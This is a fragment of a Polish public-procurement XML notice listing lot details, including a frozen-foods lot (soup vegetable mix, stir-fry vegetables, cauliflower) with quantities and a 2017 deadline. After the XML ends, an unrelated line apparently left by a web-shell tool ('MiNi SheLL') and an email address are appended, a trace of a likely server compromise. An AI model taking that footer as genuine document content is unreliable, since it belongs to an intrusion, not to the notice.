</opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>15800000-6</cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon>31/12/2017</data_kon><kryt_cena></kryt_cena><kryt_1>Cena</kryt_1><kryt_1p>60</kryt_1p></cz_7><cz_8><nr_czesci>10</nr_czesci><nazwa>Mrożonki</nazwa><opis>Lp.	Artykuły spożywcze	Objętość produktu	Jednostka miary	Ilość szacunkowa
1.		Mieszanka 7 składnikowa lub  9 składnikowa na zupę	450g	szt	80
2.		Warzywa na patelnię 	450g	szt	30
3.		Kalafior	450g	szt	30
</opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>15800000-6</cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon>31/12/2017</data_kon><kryt_cena></kryt_cena><kryt_1>Cena</kryt_1><kryt_1p>60</kryt_1p></cz_8></czesci></ZP-400>

Creat By MiNi SheLL
Email: jattceo@gmail.com